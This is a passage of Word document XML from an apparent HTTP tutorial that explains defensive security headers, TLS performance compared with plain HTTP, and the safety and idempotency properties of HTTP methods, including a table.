        <w:t>Content-Security-Policy: frame-ancestors 'none'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AA41C2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Prevents the page from being embedded in &lt;iframe&gt; on other domains — blocks </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>clickjacking</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> attacks where a transparent iframe tricks users into clicking UI elements of the target site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A97157" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>X-Content-Type-Options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076DE37C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBCCD76" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>X-Content-Type-Options: nosniff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F22F14B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Prevents browsers from </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MIME-sniffing</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> — inferring content type from content rather than the Content-Type header. Without this, a browser might execute an image file that contains JavaScript if the JavaScript is valid image format bytes at the start. With nosniff, the browser strictly follows the declared Content-Type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8FCAC0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Referrer-Policy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6961EF01" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1AEF99" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Referrer-Policy: strict-origin-when-cross-origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D66B28C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Controls how much of the referring URL is included in the Referer header on navigation. strict-origin-when-cross-origin sends only the origin (no path, no query parameters) when crossing origins — preventing leaking sensitive URL parameters (session tokens in URLs, PII in query strings) to third-party sites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DC8957" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Permissions-Policy (formerly Feature-Policy):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528D9856" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D19EAE5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Permissions-Policy: camera=(), microphone=(), geolocation=(self)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065509E5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Restricts browser feature access — prevents embedded third-party scripts from accessing the camera, microphone, or geolocation without explicit permission. A compromised third-party ad script can't silently access the user's camera.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07693A3C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-Origin Headers (CORS, COEP, COOP, CORP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEBD16F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cross-origin isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> headers enable high-precision timers and SharedArrayBuffer (needed for performance-critical web apps) by preventing cross-origin information leakage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CE6DA8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5151BA3F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Cross-Origin-Opener-Policy: same-origin       (isolate window.opener)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4762D23C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Cross-Origin-Embedder-Policy: require-corp    (require CORP for embedded resources)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35282F59" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Cross-Origin-Resource-Policy: same-origin     (prevent cross-origin embedding of this resource)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AD4438" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>These headers together create a </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cross-origin isolated</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> browsing context — the page's process is isolated from other origins, enabling Spectre mitigations while allowing SharedArrayBuffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1EFED8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="382209E6">
          <v:rect id="_x0000_i3576" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="732390E3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Performance — HTTP vs HTTPS Latency Reality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367A4E4D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The TLS Performance Cost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1AA0F0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>TLS adds overhead in three dimensions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519CDD2B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> TLS 1.3 adds 1 RTT for new connections (1 RTT TCP + 1 RTT TLS = 2 RTTs total before first byte). TLS 1.2 added 2 RTTs (1 TCP + 2 TLS = 3 RTTs). 0-RTT resumption eliminates TLS overhead for repeat connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DDAD7D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CPU:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> TLS encryption/decryption is CPU-intensive — but modern CPUs with AES-NI hardware acceleration reduce this dramatically. At Google scale, TLS accounts for </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>less than 1% of CPU overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>. On modern hardware, AES-GCM can process ~10GB/s per CPU core. TLS CPU overhead is negligible for almost all modern deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18555959" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memory:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> TLS session state requires memory — per-connection keys, sequence numbers, buffer state. At 10,000 concurrent TLS connections, this is megabytes. Significant for high-concurrency servers but manageable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D516302" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The historical performance myth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564FF5A1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>The common claim that "HTTPS is slower than HTTP" was true in 2010 (TLS 1.0, no hardware acceleration, 2-RTT handshakes, no session resumption). It is false in 2024. With TLS 1.3 (1-RTT), AES-NI hardware acceleration, HTTP/2 connection reuse, and OCSP stapling, HTTPS is barely distinguishable from HTTP in performance. Studies consistently show &lt;5% throughput difference and the latency difference is dominated by TLS handshake RTTs — eliminated by connection reuse and 0-RTT resumption for subsequent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548EFA47" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTPS can be faster than HTTP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C245900" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/2 and HTTP/3 are only available over HTTPS (browsers enforce this). HTTP/2's multiplexing, header compression, and stream prioritization make HTTPS/HTTP2 significantly faster than HTTP/HTTP1.1 for typical web pages with many resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69771B5B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="837"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/1.1: 6 parallel connections, HOL blocking per connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19616168" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="837"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/2 over HTTPS: 1 connection, full multiplexing, HPACK compression, stream prioritization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E2831C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>A page with 100 resources over HTTP/1.1 might take 5 seconds. The same page over HTTPS/HTTP2 might take 2 seconds. HTTPS with HTTP/2 is </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>faster</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> than plain HTTP with HTTP/1.1 for real-world workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CCA914" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="0CE2902E">
          <v:rect id="_x0000_i3577" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="617F5149" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. HTTP Methods — Full Semantics and Safety Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5E425F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP methods are not just conventions — they have </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>defined semantic properties</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> that affect caching, idempotency, and retry behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77252314" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Safe methods:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Do not modify server state. Can be freely cached and retried. GET, HEAD, OPTIONS, TRACE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BFBE1C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Idempotent methods:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Multiple identical requests have the same effect as a single request. GET, HEAD, PUT, DELETE, OPTIONS. Not POST or PATCH (though PATCH can be designed to be idempotent).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED1E26" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cacheable methods:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Responses can be stored in caches. GET, HEAD, POST (with explicit cache headers).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78"/>
        <w:gridCol w:w="880"/>
        <w:gridCol w:w="1669"/>
        <w:gridCol w:w="1602"/>
        <w:gridCol w:w="2156"/>
      </w:tblGrid>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="4B9923C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AA79CF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Method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0FEA84" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Safe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A4AE96" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Idempotent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CA61CC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cacheable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169685" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Body</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="3B5EDB4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FDD990" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">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904E77" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">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1F0D4F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">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4E86FC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">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9D51FA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>No (discouraged)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="20CAE09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0E3B22" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:lastRenderedPageBreak/>
              <w:t>HEAD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FF5E1E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">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CA8BC7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">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6113D4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">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42913E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="354EEF7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16345B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">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E34F70" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>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6B675C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>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690EEF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Conditional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6ED0DA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="5BBA188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46ACBC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>PUT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5D7AB8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rP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39B730" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">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359E2D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rP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021A5C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="69A5929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4CF753" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>DELETE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B8E8AB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>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C2C6D5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">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52A3A3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>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5C57EA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Optional</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="2B4204B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F55186" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>PATCH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452AAA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rP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82A34F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="006F072B">
              <w:t xml:space="preserve"> (usually)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BFE896" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rP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4AA8FE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="1B26638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BAF423" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>OPTIONS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34A388" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">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725074" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">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8546E2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>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FD36A6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Optional</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="55BACB5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C54175" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
